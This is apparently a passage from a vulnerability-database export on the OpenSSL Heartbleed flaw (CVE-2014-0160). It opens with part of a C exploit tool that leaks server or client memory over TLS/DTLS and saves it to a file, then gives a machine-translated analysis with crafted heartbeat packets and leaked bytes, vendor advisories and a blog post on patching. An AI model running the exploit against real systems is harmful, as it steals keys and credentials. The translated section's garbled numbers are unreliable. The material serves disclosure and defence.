sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22172"}], "myhack58": [{"lastseen": "2016-11-02T19:48:51", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Author: yaoxi original source http://blog.wangzhan.360.cn/\n\nRecently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named\u201cheart bleed\u201dvulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to https at the beginning of the URL, but also includes indirect use of the OpenSSL code products and services, such as VPN, mail system, FTP tools and other products and services, and may even be related to some other security facilities of the source code.\n\nThe affected version\n\nOpenSSL1. 0. 1, The 1.0.1 a, 1.0.1 b, 1.0.1 c, 1.0.1 d, 1.0.1 e, 1.0.1 f, Beta 1 of OpenSSL 1.0.2 and other versions.\n\nVulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n\nVulnerability description\n\nOpenSSL in the realization of the TLS and DTLS heartbeat processing logic, the presence of coding defects. OpenSSL's heartbeat processing logic does not detect a heartbeat packet in the length field and subsequent data fields are consistent, the attacker can take advantage of this, structural abnormalities of the data packet, to obtain the heartbeat data where the memory area of the subsequent data. These data may be contained in a certificate private key, user name, user password, user email and other sensitive information. The vulnerability allows an attacker read from memory up to 64KB of data.\n\nA few days ago of a vulnerability analysis of the articles the main focus in turn on HTTPS on the site, ordinary users may think that only the website their business will be affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.\n\nIn order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!\n\nThe test environment\n\nOS: CentOS release 6.4 (Final)\n\nOpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options\n\nWrite a Server program: monitor port 9 8 7 6\n\nVulnerability testing\n\nUse the online python validation script https://gist.github.com/RixTox/10222402 test\n\nStructural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.\n\nTest one:\n\nHeartBeat Requst packet\n\nhb = h2bin(\u201d\u2019\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 2 0 0 0\n\n\u201d\u2019)\n\nBlue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1\n\nRed 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. .... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nBlue 0 2 represents the heartbeat packet type response direction.\n\nThe corresponding source code is #define TLS1_HB_RESPONSE 2\n\nRed 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.\n\nThe green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).\n\nTest two:\n\nIn the test on the basis of one, modify the request heartbeat packets, the length field's value from 2 to 0 0 0 to 3 0 0 0\n\nHeartBeat Requst packet\n\nhb = h2bin(\"'\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 3 0 0 0\n\n\"')\n\n3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6\uff09\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0.... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nTwo test cases, the response of the length of the length value is always greater than the request length of the multi-out 1 9 a byte, why?\n\nBecause, TLS and DTLS in dealing with the type of TLS1_HB_REQUEST the heartbeat request packet logic, from the heap space on the application memory size, there are 4 part of the decision type+length+request data length+pad, where type,length,pad the field into account for 1byte and 2byte, the 16byte, so the response data is always better than the request of many out 19byte it.\n\nSource code analysis\n\nOutline\n\nThe vulnerability is mainly a memory leak problem, and the fundamental is because OpenSSL in the handling heartbeat request packet, not to the length field for 2byte, you can identify the data length is 64KB and the subsequent data fields do compliance testing. Generate a heartbeat response packet, the direct use of a length corresponding to the length from heap space application memory, not only is the real request data is much smaller than the length identified in length.\n\nRelated to parsing the source code description\n\nThe vulnerability exists in the source file there are two ssl/d1_both. c and ssl/t1_lib. c.\n\nHeartbeat processing logic, respectively, is dtls1_process_heartbeat and tls1_process_heartbeat two functions.\n\ndtls1_process_heartbeat function processing logic:\n\nStep1. Get heartbeat request packet corresponding to the SSLv3 record the data in the pointer field pointing to the request of the requested data portion.\n\nunsigned char *p = &s->s3->rrec. data[0];\n\nrecord the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.\n\n**[1] [[2]](<44409_2.htm>) [next](<44409_2.htm>)**\n", "edition": 1, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "MYHACK58:62201444409", "href": "http://www.myhack58.com/Article/html/3/62/2014/44409.htm", "type": "myhack58", "title": "Than imagined more terror! OpenSSL\u201ceffort\u201dvulnerability in-depth analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openssl": [{"lastseen": "2020-09-14T11:36:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": " A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta. \n\n * Fixed in OpenSSL 1.0.1g (Affected 1.0.1-1.0.1f)\n", "edition": 1, "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/secadv/20140407.txt", "title": "Vulnerability in OpenSSL - TLS heartbeat read overrun ", "type": "openssl", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "edition": 1, "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "atlassian": [{"lastseen": "2019-05-29T17:29:03", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Cloud*. Using *JIRA Server*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-38927].\n {panel}\n\n\n{quote}\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\n\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\n{quote}\n\n*Note*\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "edition": 9, "modified": "2019-04-16T03:53:37", "published": "2014-06-26T19:39:26", "id": "ATLASSIAN:JRACLOUD-38927", "href": "https://jira.atlassian.com/browse/JRACLOUD-38927", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hp": [{"lastseen": "2020-06-22T12:49:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information\n\n## VULNERABILITY SUMMARY\nThe \u201cHeartbleed\u201d vulnerability was detected in specific OpenSSL versions. OpenSSL is a 3rd party product that is embedded with some of HP products. This bulletin\u2019s objective is to notify HP customers about certain HP Thin Client class of products affected by the \u201cHeartbleed\u201d vulnerability. HP will continue to release additional bulletins advising customers about other HP products\n\n> note:\n> \n> The \u201cHeartbleed\u201d vulnerability (CVE-2014-0160) is a vulnerability found in the OpenSSL cryptographic software library. This weakness potentially allows disclosure of information that is normally protected by the SSL/TLS protocol. The impacted products in the list below are vulnerable due to embedding OpenSSL standard release software.\n\n## RESOLUTION\nHP has released a patch to address this vulnerability for the impacted versions HP ThinPro OS version 4.4 and HP Smart Zero Core Services version 4.4. \n\nThe patch is available here: <ftp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/openssl-service-pack-1.0-all-4.4-x86.xar>\n", "edition": 1, "modified": "2014-04-24T00:00:00", "published": "2014-04-23T00:00:00", "id": "HP:C04262670", "href": "https://support.hp.com/us-en/document/c04262670", "title": "HPSBHF03021 rev.1 - HP Thin Client with ThinPro OS or Smart Zero Core Services, Running OpenSSL, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-24T13:21:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information \n\n## VULNERABILITY SUMMARY\nA potential vulnerability exists in HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers. This is the OpenSSL vulnerability known as \"Heartbleed\" (CVE-2014-0160) which could be exploited remotely resulting in disclosure of information.\n\n## RESOLUTION\nHP has provided firmware updates that address this vulnerability. Please see the table below. To obtain the updated firmware, go to the HP Software and Drivers page for your product and find the firmware update from the list of available software. \n\nProduct Name \n\n| \n\nModel Number \n\n| \n\nFirmware Revision \n \n---|---|--- \n \nProduct Name \n\n| \n\nModel \n\n| \n\nFirmware Update Version \n \nHP LaserJet Pro M435nw Multifunction Printer \n\n| \n\nA3E42A \n\n| \n\nv 20140411 (or higher) \n \nHP LaserJet Pro 500 color MFP M570 \n\n| \n\nCZ271A, CZ272A \n\n| \n\nv 20140411 (or higher) \n \nHP LaserJet Pro M521 Multifunction Printer \n\n| \n\nA8P79A, A8P80A \n\n| \n\nv 20140411 (or higher) \n \nHP Color LaserJet Pro MFP M476 \n\n| \n\nCF387A, CF386A, CF385A \n\n| \n\nv 20140410 (or higher) \n \nHP LaserJet Pro M701/M706 Printer \n\n| \n\nB6S00A, B6S01A, B6S02A \n\n| \n\nv 20140411 (or higher) \n", "edition": 3, "modified": "2017-07-13T00:00:00", "published": "2014-04-22T00:00:00", "id": "HP:C04262495", "href": "https://support.hp.com/us-en/document/c04262495", "title": "HPSBPI03014 rev.2 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032287.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "edition": 3, "modified": "2014-04-08T02:54:58", "published": "2014-04-08T02:54:58", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032287.html", "id": "CESA-2014:0376", "title": "openssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2019-09-16T21:30:59", "bulletinFamily": "blog", "cvelist": ["CVE-2014-0160"], "description": "The Heartbleed vulnerability was introduced into the OpenSSL crypto library in 2012. It was discovered and fixed in 2014, yet today\u2014five years later\u2014[there are still unpatched systems](<https://www.securityweek.com/heartbleed-still-affects-200000-devices-shodan>). \n\n\nThis article will provide IT teams with the necessary information to decide whether or not to apply the Heartbleed vulnerability fix. However, we caution: The latter could leave your users\u2019 data exposed to future attacks. \n\n### What is the Heartbleed vulnerability?\n\nHeartbleed is a code flaw in the OpenSSL cryptography library. This is what it looks like:\n \n \n memcpy(bp, pl, payload);\n\nIn 2014, a vulnerability was found in [OpenSSL](<https://www.openssl.org/blog/blog/2015/09/28/critical-security-level/>), which is a popular cryptography library. OpenSSL provides developers with tools and resources for the implementation of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. \n\n\nWebsites, emails, instant messaging (IM) applications, and [virtual private networks (VPNs)](<https://blog.malwarebytes.com/glossary/vpn/>) rely on SSL and TLS protocols for security and privacy of communication over the Internet. Applications with OpenSSL components were exposed to the Heartbleed vulnerability. At the time of discovery, that was 17 percent of all SSL servers. \n\n\nUpon discovery, the vulnerability was given the official vulnerability identifier CVE-2014-0160, but it\u2019s more commonly known by the name Heartbleed. The latter was invented by an engineer from Codenomicon, who was one of the people that discovered the vulnerability. \n\n\nThe name Heartbleed is derived from the source of the vulnerability\u2014a buggy implementation of the RFC 6520 Heartbeat extension, which packed inside it the SSL and TLS protocols for OpenSSL.\n\n### Heartbleed vulnerability behavior\n\nThe Heartbleed vulnerability weakens the security of the most common Internet communication protocols ([SSL and TSL](<https://www.globalsign.com/en/blog/ssl-vs-tls-difference/>)). Websites affected by Heartbleed allow potential attackers to read their memory. That means the encryption keys could be found by savvy cybercriminals. \n\n\nWith the encryption keys exposed, threat actors could gain access to the credentials\u2014such as names and passwords\u2014required to hack into systems. From within the system, depending on the authorization level of the stolen credentials, threat actors can initiate more attacks, eavesdrop on communications, impersonate users, and steal data.\n\n### How Heartbleed works\n\n\n\n[Image source](<https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Simplified_Heartbleed_explanation.svg/1920px-Simplified_Heartbleed_explanation.svg.png> \"\" ) \n\n\nThe Heartbleed vulnerability damages the security of communication between SSL and TLS servers and clients because it weakens the Heartbeat extension. \n\n\nIdeally, the Heartbeat extension is supposed to secure the SSL and TLS protocols by validating requests made to the server. It allows a computer on one end of the communication to send a Heartbeat Request message. \n\n\nEach message contains a [payload](<https://blog.malwarebytes.com/glossary/payload/>)\u2014a text string that contains the transmitted information\u2014and a number that represents the memory length of the payload\u2014usually as a 16-bit integer. Before providing the requested information, the heartbeat extension is supposed to do a bounds check that validates the input request and returns the exact payload length that was requested. \n\n\nThe flaw in the OpenSSL heartbeat extension created a vulnerability in the validation process. Instead of doing a bounds check, the Heartbeat extension allocated a memory buffer without going through the validation process. Threat actors could send a request and receive up to 64 kilobytes of any of the information available in the memory buffer. \n\n\nMemory buffers are temporary memory storage locations, created for the purpose of storing data in transit. They may contain batches of data types, which represent different stores of information. Essentially, a memory buffer keeps information before it\u2019s sent to its designated location. \n\n\nA memory buffer doesn\u2019t organize data\u2014it stores it in batches. One memory buffer may contain sensitive and financial information, as well as credentials, cookies, website pages and images, digital assets, and any data in transit. When threat actors exploit the Heartbleed vulnerability, they trick the Heartbeat extension into providing them with all of the information available within the memory buffer.\n\n### The Heartbleed fix\n\nBodo Moeller and Adam Langley of Google created the fix for Heartbleed. They wrote a code that told the Heartbeat extension to ignore any Heartbeat Request message that asks for more data than the payload needs. \n\n\nHere\u2019s an example of a [Heartbleed fix](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>):\n \n \n if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; /* silently discard per RFC 6520 sec. 4 */\n\n### How the Heartbleed vulnerability shaped OpenSSL as we know it\n\nThe [discovery of the Heartbleed vulnerability](<https://resources.whitesourcesoftware.com/blog-whitesource/how-the-heartbleed-vulnerability-shaped-openssl-as-we-know-it>) created worldwide panic. Once the fixes were applied, idle fingers started looking for the causes of the incident. Close scrutiny at OpenSSL revealed that this widely-popular library was maintained solely by two men with a shockingly low budget. \n\n\nThis finding spurred two positive initiatives that changed the landscape of open-source:\n\n * Organizations realized the importance of supporting open-source projects. There\u2019s only so much two people can do with their personal savings. Organizations, on the other hand, can provide the resources needed to maintain the security of open-source projects.\n * To help finance important open-source projects, Linux started the Core Infrastructure Initiative (CII). The CII chooses the most critical open-source projects, which are deemed essential for the vitality of the Internet and other information systems. The CII receives donations from large organizations and offers them to OSS initiatives in the form of programs and grants.\n\nAs with any change-leading crisis, the Heartbleed vulnerability also carried a negative side-effect: the rise of vulnerability brands. The Heartbleed vulnerability was discovered at the same time by two entities\u2014Google and Codenomicon. \n\n\nGoogle chose to disclose the vulnerability privately, sharing the information only with OpenSSL contributors. Codenomicon, on the other hand, chose to spread the news to the public. They named the vulnerability, created a logo and a website, and approached the announcement like a well-funded marketing event. \n\n\nIn the following years, many of the disclosed vulnerabilities were given an almost celebrity-like treatment, with PR agencies building them up into brands, and marketing agencies deploying branded names, logos, and websites. While this can certainly help warn the public against [zero-day ](<https://blog.malwarebytes.com/glossary/zero-day/>)vulnerabilities, it can also create massive confusion. \n\n\nNowadays, security experts and software developers are dealing with vulnerabilities in the thousands. To properly protect their systems, they need to prioritize vulnerabilities. That means deciding which vulnerability requires patching now, and which could be postponed. Sometimes, branded vulnerabilities are marketed as critical when they aren\u2019t. \n\n\nWhen that happens, not all affected parties have the time, skills, and resources to determine the true importance of the vulnerability. Instead of turning vulnerabilities into a buzz word, professionals could better serve the public by creating fixes.\n\n### Heartbleed today\n\nToday, five years after the disclosure of the Heartbleed vulnerability, it still exists in many servers and systems. Current versions of OpenSSL, of course, were fixed. However, systems that didn\u2019t (or couldn't) upgrade to the patched version of OpenSSL are still affected by the vulnerability and open to attack. \n\n\nFor threat actors, finding the Heartbleed vulnerability is a prize; one more easily accessed by automating the work of retrieving it. Once the threat actor finds a vulnerable system, it\u2019s relatively simple to exploit the vulnerability. When that happens, the threat actor gains access to information and/or credentials that could be used to launch other attacks. \n\n### To patch or not to patch\n\nThe Heartbleed vulnerability is a security bug that was introduced into OpenSSL due to human error. Due to the popularity of OpenSSL, many applications were impacted, and threat actors were able to obtain a huge amount of data. \n\n\nFollowing the discovery of the vulnerability, Google employees found a solution and provided OpenSSL contributors with the code that fixed the issue. OpenSSL users were then instructed to upgrade to the latest OpenSSL version. \n\n\nToday, however, the Heartbleed vulnerability can still be found in applications, systems, and devices, even though it\u2019s a matter of upgrading the OpenSSL version rather than editing the codebase. If you are concerned that you may be affected, you can [test your system](<https://geekflare.com/how-to-test-heart-bleed-ssl-vulnerabilities-cve-2014-0160/>) for the Heartbleed vulnerability and patch to eliminate the risk or mitigate, if the device is unable to support patching.\n\nAny server or cloud platform should be relatively easy to patch. However, IoT devices may require more advanced mitigation techniques, because they are sometimes unable to be patched. At this point, we recommend speaking with your sysadmin to determine how to mitigate the issue.\n\nThe post [Five years later, Heartbleed vulnerability still unpatched](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-09-12T15:00:00", "published": "2019-09-12T15:00:00", "id": "MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/", "type": "malwarebytes", "title": "Five years later, Heartbleed vulnerability still unpatched", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:46", 